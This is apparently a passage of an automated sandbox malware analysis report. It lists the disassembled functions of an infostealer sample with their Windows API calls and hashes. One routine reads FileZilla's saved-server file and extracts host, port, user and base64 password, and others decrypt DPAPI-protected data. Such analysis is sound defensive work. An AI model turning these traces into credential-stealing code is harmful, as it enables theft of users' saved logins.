                                                        • Instruction Fuzzy Hash: 6921A3BC9002059FDB14DF69F889A963BE4FB0A315F50407AE90987265EBB05981EF49
                                                        Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 3657800372-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                        Function 00B274A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B274B4
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B274BB
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B274E8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B2750B
                                                        • LocalFree.KERNEL32(?), ref: 00B27515
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 2609814428-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: 209d6596fd5358c6505e91bb7ddf907c5929fec50edcc8d3568e848e0573de5d
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: A0011275B80208BFEB10DFD4DD45F9D77B9EB44704F104155F705AB2C0DA70AA008B65
                                                        Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                        Function 00B39867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B39885
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00B39899
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B398AE
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00B398C3
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 00B398E1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 1ad1d9a271b374f13060621a3394ec28463fded74aeb28a8fdde89fbe3bf4d54
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: 45014C79A40208FFDB20DFE4CC94BEDB7F9EB49740F1041C9A505A6240D7749A44CF51
                                                        Function 00B2E697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B2E709
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B2E759
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B2E76F
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2EE46
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 433455689-0
                                                        • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction ID: fd4b57cea001f9d26ad720aba9dca141c0dc311421696dda985266b3a6a11523
                                                        • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction Fuzzy Hash: DB1211729102146BCB18FB60DD96EED73B9AF55700F7041EDB54A62091EE345F88CF52
                                                        Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                        Function 00B39107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,00B253EB,40000001,00000000,00000000,?,00B253EB), ref: 00B39127
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptString
                                                        • String ID:
                                                        • API String ID: 80407269-0
                                                        • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction ID: b221af2896fa5f7200e6f61984041ff5985cb7d46c535ca4488acfaa34af27ca
                                                        • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                        • Instruction Fuzzy Hash: 6B11EC74204605BFDB00CF94DC89FA733EAEF89754F209598F909AB250D7B5E842DBA0
                                                        Function 00B29D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                        • LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID:
                                                        • API String ID: 4291131564-0
                                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction ID: c681dda3f515b9250e790341f7a69bcf7aacaf2e0bd8ebed254078c79965a030
                                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                        • Instruction Fuzzy Hash: 0011A4B4240208FFEB10CFA4DC95FAA77B5EB89704F208058FD199B394C776A901CB90
                                                        Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                        • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                        • LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                        Function 00B29DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B29DEB
                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B29E0A
                                                        • memcpy.MSVCRT(?,?,?), ref: 00B29E2D
                                                        • LocalFree.KERNEL32(?), ref: 00B29E3A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                        • String ID:
                                                        • API String ID: 3243516280-0
                                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction ID: c6aa5fe04d0ce49e13905ab4aeb9c488d8ffbf09fd3bfef5da70ab552c9985ea
                                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                        • Instruction Fuzzy Hash: 0E11FAB8A00209EFDB04DFA4D985AAE77F5FF89300F104558E91997350D730AE10CF61
                                                        Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00829B58,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                        • wsprintfA.USER32 ref: 00417AB7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                        • String ID:
                                                        • API String ID: 362916592-0
                                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                        • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                        Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID:
                                                        • API String ID: 123533781-0
                                                        • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                        • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                        • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                        Function 00B3D1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: free
                                                        • String ID:
                                                        • API String ID: 1294909896-0
                                                        • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction ID: 9a3998a0e24f1c0077f2698e71d2faf349180f842f74fef1c46c5aaa869584de
                                                        • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction Fuzzy Hash: C371D4314D1B40DBD7633B31DD03E4A7AEA7F04302F314AB4B1DB28D369E2268659B52
                                                        Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • strtok_s.MSVCRT ref: 0041031B
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                          • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                          • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                        • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                        • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                        • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                        • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                        • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                        • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                        • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                        • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                        • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                        • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                        • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                        • strtok_s.MSVCRT ref: 00410679
                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                        • memset.MSVCRT ref: 004106DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                        • API String ID: 337689325-514892060
                                                        • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                        • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                        Function 00B24827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlen.KERNEL32(00424DA0), ref: 00B24833
                                                        • lstrlen.KERNEL32(00424E50), ref: 00B2483E
                                                        • lstrlen.KERNEL32(00424F18), ref: 00B24849
                                                        • lstrlen.KERNEL32(00424FD0), ref: 00B24854
                                                        • lstrlen.KERNEL32(00425078), ref: 00B2485F
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B2486E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B24875
                                                        • lstrlen.KERNEL32(00425120), ref: 00B24883
                                                        • lstrlen.KERNEL32(004251C8), ref: 00B2488E
                                                        • lstrlen.KERNEL32(00425270), ref: 00B24899
                                                        • lstrlen.KERNEL32(00425318), ref: 00B248A4
                                                        • lstrlen.KERNEL32(004253C0), ref: 00B248AF
                                                        • lstrlen.KERNEL32(00425468), ref: 00B248C3
                                                        • lstrlen.KERNEL32(00425510), ref: 00B248CE
                                                        • lstrlen.KERNEL32(004255B8), ref: 00B248D9
                                                        • lstrlen.KERNEL32(00425660), ref: 00B248E4
                                                        • lstrlen.KERNEL32(00425708), ref: 00B248EF
                                                        • lstrlen.KERNEL32(004257B0), ref: 00B24918
                                                        • lstrlen.KERNEL32(00425858), ref: 00B24923
                                                        • lstrlen.KERNEL32(00425920), ref: 00B2492E
